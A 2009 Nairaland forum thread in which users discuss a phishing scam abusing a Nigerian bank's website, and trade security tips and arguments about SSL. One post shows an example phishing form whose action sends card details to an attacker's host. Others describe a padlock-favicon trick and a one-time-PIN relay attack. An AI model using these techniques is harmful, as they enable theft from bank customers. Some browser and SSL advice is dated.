Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / NewStats: 3,195,653 members, 7,958,979 topics. Date: Thursday, 26 September 2024 at 08:36 AM |
Nairaland Forum / Science/Technology / Webmasters / Equitorial Bank Website Used For Interswitch 419 Scam (11426 Views)
Royal Rumble! Paga Vs. Voguepay. Vs Gtpay. Vs Interswitch. Vs Zenith Global Pay / Powerful Webmaster Needed For Interswitch Intergrated Website / Interswitch /etransact And Vpay Cards For N15,000 Set Up ? (2) (3) (4)
(1) (2) (3) (4) (5) (Reply) (Go Down)
Re: Equitorial Bank Website Used For Interswitch 419 Scam by cystein(m): 11:58am On Jun 07, 2009 |
Well guys this aint a difficult thing to do. What happens in this case is the scammers pick the page source but edit the form action for example. If i have a form that i want to defraud you with i can easily set it as follows. <form action="http://mywebsite.com/snb/9071:8080" that instead posts me your card details enough to give me access to your account. Always call the bank on the original numbers and not the contacts issued on the site |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by pixiraver(m): 3:26pm On Jun 07, 2009 |
Stupid idiots, they keep sending me such mails and i simply ignore them because i know my bank won't send me such emails. All this banks need to employ proffessionals to handle their IT departments and not "Otigba" boys |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by pixiraver(m): 3:28pm On Jun 07, 2009 |
Stupid idiots, they keep sending me such mails and i simply ignore them because i know my bank won't send me such emails. All this banks need to employ proffessionals to handle their IT departments and not "Otigba" boys |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by GeorgeD1(m): 8:42pm On Jun 07, 2009 |
this crap is not new. its been going on for over a year now. the fact that these smart alecs keep sending the same mail to same people twenty times over shows that they're not that smart after all. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 11:05pm On Jun 07, 2009 |
aeso: You have said it all. I have a but though. I encountered a scenario with one of my client's when they had Phishing problem. A scammer actually placed a padlock image as a FAVICON. When the innocent customer received the phishing email, the first thing he checked was d padlock, which was trickily placed on the FAVICON IMAGE , what do you say to that |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 12:09am On Jun 08, 2009 |
nitation: Good one; users will just have to be educated on where to look for the padlock and also make sure the URL begins with https; it really depends on the browser though; whether the browser uses a padlock or key. IE and Firefox use padlocks, I think Safari uses a key, not sure now what Opera uses. In IE and Firefox, the padlock should be at the bottom right, near the system clock. The users must double click it as well to verify it belongs to the bank and not some other site. It would be difficult to obtain a certificate in another company's name because of all the protocol it takes to obtain one, so this step is secure. There is a new type of certificate called the Extended SSL Validation Certificate. If the site uses that, the browser address bar will turn green, just before the URL. It was designed that way so users can quickly notice it. Of course you'll need IE7 or Firefox 3. I am proud my bank has implemented this already: Open GTBank's Internet banking website at https://ibank.gtbank.com/ibank2/login.aspx to see what I mean. The bank's name will also be indicated in the green bar, making it obvious. Most of the phishing scams capitalize on the fact that users don't know what to watch out for, and it boils down to educating them and hoping they remember to lookout for these things. Beyond that, there's really nothing else the bank, web developers, or security admins can do. It's all an end-user intelligence thing. One other thing about Interswitch is that at the time of entering your PIN for a transaction, a java applet MUST be downloaded which provides a KEYPAD for entering the digits. The keypad is intended to thwart the efforts of those that install keyloggers on systems to capture keyboard strokes. That java applet must also be verified by clicking on the Verisign logo. Hope this answers your question? |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by shockreaction(m): 6:40am On Jun 08, 2009 |
Considering that their site was hacked a while ago, I can't say I'm surprised. Unfortunately, I lost the screenshot. Ah well. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Kay1kay1(m): 10:03am On Jun 08, 2009 |
Every bank gets a clone in these emails.It's not in anyway the bank's carelessness.Few tips can help online customers. 1.Never enter your online banking through a link.Type in the site directly. 2.Never use wifi hotspots for online banking. 3.Use a very strong password.A military password with mixed numbers in between. 4.Never give anyone your password,as you may not if the connection being used is secure or not. 5.Change your passwords regularly. 6.Make sure your bank has email or sms notifications when deposits or withdrawals are made. 7.Use a digicode reader-a wireless device issued by your bank which gives random numbers which have to be entered on your online banking page. If you are comfortable with the online thingy ,switch to traditional banking instead. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Kay1kay1(m): 10:06am On Jun 08, 2009 |
Every bank gets a clone in these emails.It's not in anyway the bank's carelessness.Few tips can help online customers. 1.Never enter your online banking through a link.Type in the site directly. 2.Never use wifi hotspots for online banking. 3.Use a very strong password.A military password with mixed numbers in between. 4.Never give anyone your password,as you may not if the connection being used is secure or not. 5.Change your passwords regularly. 6.Make sure your bank has email or sms notifications when deposits or withdrawals are made. 7.Use a digicode reader-a wireless device issued by your bank which gives random numbers which have to be entered on your online banking page. If you are comfortable with the online thingy ,switch to traditional banking instead. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Kay1kay1(m): 12:48pm On Jun 08, 2009 |
It's not necessarily bank's fault.Any site can be cloned.Most times fraud's due to the carelessness of the customer. Here are some tips. 1.Never enter online banking through a link. 2.Never use a wifi hotspot for online banking. 3.Use a millitary password.Letters and numbers mixed in between. 4.Never give anyone your password as you may not know how secure the connection being used. 5.Make sure your bank issues sms/email notifications whenever deposits or withdrawals are made. 6.Change your password regularly say every month. 7.You can use a digicode reader-a wireless device from your bank that generates random numbers whenever you use internet banking . If you feel uneasy about the online thingy,switch to traditional banking. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 1:51pm On Jun 08, 2009 |
@kaykay, I believe it is the fault of the bank and not no one else. Being a bank, they are supposed to do some penetration testing. @nitation I am quite in support of ur views, I think what these banks are supposed to do is educate customers when they are setting up online banking for them. which they fail to do. and Yes, I think people also need to be educated about the Extended Validation. For banks that are yet to implement it, I will say, it cost nothing to install SSL, SSL costs $45 and can be installed by anyone. shebi na padlock you wan see, you go see am na! It is best you dont subscribe to online transfer if you dont clearly understand the risks involved aeso: In addition to that, ur session expires in 2 mins of inactivity making is difficult for someone else to access ur account whenever you step out carelessly. GTB online banking does this too. at times, u have to log in severally before u can make a successful transfers which is a good security feature. Another common mistake ppl make is that they tend to use the same password for all accounts online. for instance, Seun definitely has access to ur nairaland password, forget encryption bla bla (Just an example, hope i don get banned) so, using the same password for you mailbox could be suicidal. considering the fact that many websites nowadays have a password reminder. An attacker can just go to the website and fill the "i forgot my password" form and you may be banking with one of the dumbest banks who will mail your password to your email box. Boom, you will pay for it It is secure to classify websites you register with into 4 categories, that is if you have problems with passwords 1. Zero trust e.g torrent sites, forums 2. less trusted e.g facebook 3. trusted e.g yahoomail, gmail etc 4. Most trusted e.g paypal, online banking etc let the 1, 2, and 3 share different level of passwords and change class 3 password regularly Class 4, should have different hard to guess passwords if possible. and yet, passwords can still be cracked, u may use passwords as secure as e#4a(6^l;vo if anyone can crack that, then they can have your money cos they actually worked for it |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 4:49pm On Jun 08, 2009 |
@ webdezzi IMO, pen testing is gradually losing its relevance. What attackers do now is wait patiently for newly discovered vulnerabilities and quickly exploit them the day they are made known (zero-day attacks), probably before developers release patches and definitely before sys/web admins can patch their servers. It also depends on who discovered the vulnerability - some have been circulated for months within the hacker community and have been exploited over and over again before the developers even get to know.
I've even heard of cases where celebrities use easy-to-guess secret questions - like your mother's maiden name, your boyfriend's middle name, which is almost public knowledge on the Internet (since they are celebrities) and hackers have used this to "recover" their passwords and gain access to their accounts. Another worrisome trend is the installation of keyloggers on systems at Internet cafes that monitor everything that was typed on the system for the whole of that day without the users' knowledge, including sites visited, usernames, passwords, etc. All an attacker needs do is come back at the end of the day to retrieve all the confidential info typed for that day and see what damage he can do with them. In short, never provide any confidential information in a cafe. There are also a number of "free" antivirus software packages advertised on the Internet at random as flash animations screaming to be downloaded and claiming to offer protection from viruses, etc. Most of these are actually spyware that spy on the activities of the unsuspecting user and are very difficult to uninstall from the system. In short there are just too many risks the average computer user must face. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 4:55pm On Jun 08, 2009 |
webdezzi:Have you implemented this yourself? At times those who know what to don't do them, |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 7:37pm On Jun 08, 2009 |
@ Aeso In Jupiter where I reside, one of the leading banks' lost over $200million in 6 months on internet banking phishing scam. What the bank did was to implement the One-Time Pin technology (for those who care to know - this is an algorithm calculation that generate numbers/codes for a user who is accessing the internet banking at a particular time through SMS preferably or email and it expires within a time-frame). What happens next was, it became very difficult for phishers to trick people into providing their internet banking details. Even if they do, they(the phishers) do not have access to the user's cellphone. Now a MITM attack surfaced. Hackers develop an application that exploits communication between the user and the server residing on a secured location - am referring to SSL. Like my first post - Phishing has gone beyond how it seem Open for arguement -> - nitation |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by airroseice(m): 11:57pm On Jun 08, 2009 |
Lord help us! |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 4:14am On Jun 09, 2009 |
nitation: I don't see how an MITM attack would succeed if you are communicating over SSL with the true bank's servers in the first place and you make sure it remains tha banks' server THROUGHOUT the transaction period. That's why I said earlier to always make sure the protocol is https and click on the padlock to verify the details on the certificate since anyone can easily obtain a certificate. If there are any changes, the browser should warn the user except that option has been turned off, which is so in many systems anyway. The MITM attack would only work for non-encrpted channels or where the certificate containing the bank's private key has been stolen or a certificate accidentally issued in the bank's name to the perpetrators of the MITM attack. MITM attacks have been successful where the attacker establishes https with the bank's server, but http with the client. In such cases the browser would warn that the client in about to switch from an encrpted mode to unencrypted and ask if to continue. Most people would just click YES and won't notice the change to http (these issues are too technical for the average user). The other way such an MITM would work is if the attacker obtained a certificate in the bank's name. I remember Verisign once made the mistake of issuing 2 certificates in Microsoft's name to an impostor in 2001, which they later discovered through routine auditing after 6 weeks . Besides that I haven't heard of any others or well, none have been publicly disclosed . |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by LRcard: 6:07am On Jun 09, 2009 |
Kay1kay1: |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 6:42am On Jun 09, 2009 |
@ LR_card LR_card: I kind of agree to some extent with both you and Kay1kay1. Although the bank should do the best to secure their servers, the best is never good enough in security. All it takes to hack a system is to discover a flaw in the software. Flaws are discovered everyday and it is usually a cat and mouse game between hackers quickly exploiting the flaws and sys admins patching them. A determined hacker would usually wait patiently for a flaw to be discovered that he can exploit and quickly exploit it once known. Sys admins usually have to wait for the software developer to release a patch to correct the flaw, so they are at a disadvantage. However, most sysadmins never even bother to patch their systems even after patches have been released, and moreover, banks should have intrusion detection software installed on their web servers so they can know if unauthorized changes have taken place. so you do have a point as well . |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 5:18pm On Jun 09, 2009 |
@ Aeso On contrary, If a website use only one-way SSL security (only the website has an SSL certificate) instead of two-way, which was the intention of SSL in the first place, then MITM can take place. In real terms, this is regarded as phishing 2.0 more sophisticated to the traditional method of phishing. Citibank fell victim in 2006 or so. - nitation |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 8:50am On Jun 10, 2009 |
nitation: SSL security for web browsing has always been 1-way, so I don't quite understand what you mean. The server sends its identification to the browser in a certificate that contains its [i]public [/i]key and the certificate is signed by a CA e.g. Verisign, with the CA's [i]private [/i]key. All the browser does is to verify that the CA that signed the certificate is on its trusted list and that the certificate is not listed in a list of revoked certificates. The browser cannot confirm the contents or which site owns the certificate, you will have to verify that yourself by opening the padlock and checking the certificate. The browser can only trust the certificate because it was signed with the private key of a trusted CA e.g. Verisign. The browser fetches the [i]public [/i]key of the server from the certificate and uses it to encrypt messages. Messages encrypted by the public key can only be decrypted by the corresponding private key. Thus only the true server will be able to decrypt because only that server would have the right private key which is never made public. If a man-in-the-middle is launched, it cannot succeed unless one of these is true: Encrypted connections from the server terminate at the MITM and new [i]unencrypted [/i]connections are established from the MITM to the user's browser; in this case the browser would [b]warn [/b]the user that the encrypted connection is about to be broken and if the user would like to continue OR Encrypted connections from the server terminate at the MITM and new [i]encrypted [/i]connections are established to the client using the MITM's certificate key. OR The MITM has a copy of the server's private key and can open and intercept encrypted messages from the client and therefore view the account details. Hope this makes sense? Cryptography is one of the toughest areas of security, so most ppl run from it |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 11:06am On Jun 10, 2009 |
@ Aeso To put an end to our endless argument. This is what is certain: SSL guarantee confidentiality and authentication only. There are many threats that attack web applications, including SQL Injection, XSS, CSRF, Denial of Service, Brute-Force-Attack, MITM, etc. The technicality of the situation may not be understood by an average user in MITM case. - nitation |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 7:49pm On Jun 10, 2009 |
In this scenerio, MITM is an overkill For an attacker to have been able to upload a file to that server, haba! i wont want to talk about the endless possibilities. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by lastpage: 1:33am On Jun 11, 2009 |
We've blamed the bank, We've blamed the Hacker, We even blamed the "mugu" Client, What about the GREEDY yob? In most cases except your greedy tendencies take over, if you did not register with ETB or InetrSwitch, and some site is claiming to cancel your ATM Card, what should you do? PRESS DELETE KEY!. end of story!! Or may be my greedy friend thinks such scam-mails can "unlock" some secret access to a fat ATM-bank account for them? I've never walked into a banking hall since 2004 (l just detest the often useless questions and time-wasting that goes on in there at times) and l am yet to be duped online bu then, l've never wished to "win a lottery" or "inherit money from an unknown uncle" or from one American that died on flight 447! Finally, the Golden rule of E-mail: If you can not recognize the "sender" or the "subject" as [b]legitimate, first time,[/b] hug the DELETE KEY. Am out for lunch. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 2:29am On Jun 11, 2009 |
@nitation Correction - SSL in this scenario will guarantee only confidentiality, not authentication because the client's id cannot be verified to the server and the server's true id cannot be verified to the client. Probably integrity depending on the context. We have to differentiate between 2 types of losses here: 1. A bank loses money because an attacker was able to hack directly into the bank's records. This is majorly the bank's fault for inadequately protecting their systems, but very sophisticated attackers are usually ahead of the defenders, so it can still happen to any bank irrespective of all security measures the bank puts in place e.g. zero-day attacks. 2. A bank loses money because an attacker tricked [/i]users into providing their details. This is not the bank's fault and the [i]only concrete things [/i]the bank can do are to: a) educate its customers against falling for these tricks. MITM also falls in this category because it is [i]outside the bank's control. b) provide additional layers of authentication e.g. SMS authentication, token authentication or email authentication (least secure) before completing any transaction. This will thwart MITMs and XSS except the attacker also got hold of the 2nd layer authentication algorithm used for generating the authentication codes, or got hold of the users' tokens. @webdazzi The scenario in this topic is quite simple and falls under no. 2. I agree with webdezzi; MITM is an overkill and wasted effort in this case when easier methods are available. @ nitation - I am not saying the MITM against your bank which had additional layers of authentication is not possible; all I need to know is the exact details of how it worked to convince me it actually worked. Merely mentioning it was MITM or a complex attack is certainly insufficient to convince me. For the records I'm a CISSP, CISSP-ISSAP, CEH and GCIA, should you need my services . |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by nitation(m): 8:20am On Jun 11, 2009 |
@ Aeso I can see you have bag in all the certificates. In this field,experience is what counts! I do not know how long you have been doing your thing, but one thing that is certain is, you have limited your ability to what you have encountered only. More so, I was giving a general understanding of what the SSL does and not in the MITM situation. This is also gonna be my last argument on this topic as it's taking us no where. I am willing to contribute more on educative topics. Take a look at this scenario: Bank X introduced the One-Time-Pin security feature for it customers whereby before any transaction can be carried out , an eight-randomly generated pin would be sent to the customer's cellphone. Let us continue 1) An attacker tricks a user to click on a link; 2) The user entered his/her details on the attackers crafted page, 3) Suddenly, a one time pin was sent to the user's cell phone. The user not knowing, entered the OTP on the attackers page. 4) The attacker has 30 minutes to perform whatever transaction as the one-time-pin will expire. The question here is , why did the bank send the valid one-time pin to the user's cellphone even though he/she is not accessing the original website. -nitation |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 9:55am On Jun 11, 2009 |
@nitation My brother no be fight. Get what you mean now! This would not be a classical MITM. More like general identity theft. Here: [list] [li]The attacker sets up a rogue site that clearly isn't the bank's site (be it http or https)[/li] [li]Users details are collected @ rogue site and automated script forwards details to bank's servers[/li] [li]Bank's server sends OTP to user's phone[/li] [li]User enters OTP in hacker's web page[/li] [li]Hacker collects OTP and previous account details and accesses user's account[/li] [/list] The bottom line is that it follows the same principle as the general attack. Users should not login to their bank accounts using web links. They should type the URL directly in the browser or use a search engine like Google that has a complex ranking to locate the Internet banking URL for the bank if they are not sure. In most cases the real bank's URL will appear highest in the results. They should make sure the connection is https, check for the padlock and click it to verify the server they are submitting credentials to. nitation:The CISSP is awarded after passing the exam and showing auditable evidence of 5 years work experience. The ISSAP requires CISSP, passing another exam and another 2 yrs experience in security architecture, so I have a minimum of 7 years experience if not more . |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 12:39pm On Jun 11, 2009 |
@ AESO lol, in the IT industry especially security, no one talks of ISSAP CISSP etc you are as good as what you know. I am a Mechanical Engineer and trust me, I no go computer school. But my passion for IT has droven me so far that i even train ppl who already bagged NIIT certs. (said humbly) Lets keep the certs away and face reality. Technology advances everyday and same thing with ways to go around it have you heard of a 13 year old boy who hacked into their school's computers in the UK? He never had to bag those certs to do that. this link might interest you. http://www.roadnews.com/html/Articles/historyofhacking.htm also another dude got into US Defence Computers, from the UK using the internet. he shud be serving his jail terms now i guess. that's if the FBI wont invite him to work for them. And i think you guys are giving out too much information, Just as others will learn from it the many who are not aware may suffer from ppl of bad intent who may want to use these info to enrich their knowledge It is obvious that MANY of these institutions have failed, not just ETB. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by aeso(m): 6:44pm On Jun 11, 2009 |
@ webdezzi, I never studied comp. science myself; the issue of certs is more of a personal thingy though - I took them to challenge my knowledge and skills and but the ISSAP to boost my job opportunities on arriving Australia. With tens or hundreds of resumes to choose from, everything counts. But like you said, what matters most is one's personal skills. Yea lots of attacks here and there, everyday on the news, but the trend has really changed now. Most attacks you read about in the news are from script kiddies - they rely on freely available tools developed by experts but have very little technical knowledge or skills of their own. Attacks are now seriously financially and espionage- motivated; that's where the pros come in and attacks are usually sponsored, stealthy and in most cases go unnoticed because they cover their tracks. As regards giving out information, it's all freely on the Internet anyway for those who care to look. There's an unending debate about security through obscurity - and I'm for open knowledge sharing. What I mean is, for instance which is better - you design a lock for a safe, make the design blueprint open knowledge but keep the unlock code secret and difficult to figure out, or you keep the design blueprint secret, thinking that by doing so you are making it tougher to break into the safe? Statistics have shown that keeping the design blueprint secret gives you a false sense of security thinking by not making it public, it becomes more difficult to understand hence more secure. The reality is that your design will definitely have flaws which you may not see, but fellow experts can, and advice you on how to correct it. The other "hard" way is for you to know about probs with your design is when someone breaks in without knowledge of your unlock codes and you start wondering how he did it? |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by andre3000: 8:00am On Jun 12, 2009 |
I've also have received some scam emails like these ones. Very dangerous stuff. |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 5:55am On Jun 14, 2009 |
Interesting webdezzi, neither did I go to computer school, and then the guy nitation said placed padlock at favicon too, i dont think he learnt that in computer school, i am sure me sef can fall for the padlock thing! |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 6:09pm On Jun 15, 2009 |
lol, i guess you will fall for that after hour of programming and you have no clue what your surname is anymore, abi? dhtml ola-encode |
Re: Equitorial Bank Website Used For Interswitch 419 Scam by Nobody: 10:05pm On Jun 15, 2009 |
I think i am going to need to add that padlock to my site, as a favicon, who knows, maybe webdezzi will fall for it. . . |
Challenges Facing Nigerian Bloggers / How To Get Started With Blogging In Less Than 5minutes / Fg Moves To Block Internet Streaming
(Go Up)
Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health religion celebs tv-movies music-radio literature webmasters programming techmarket Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 98 |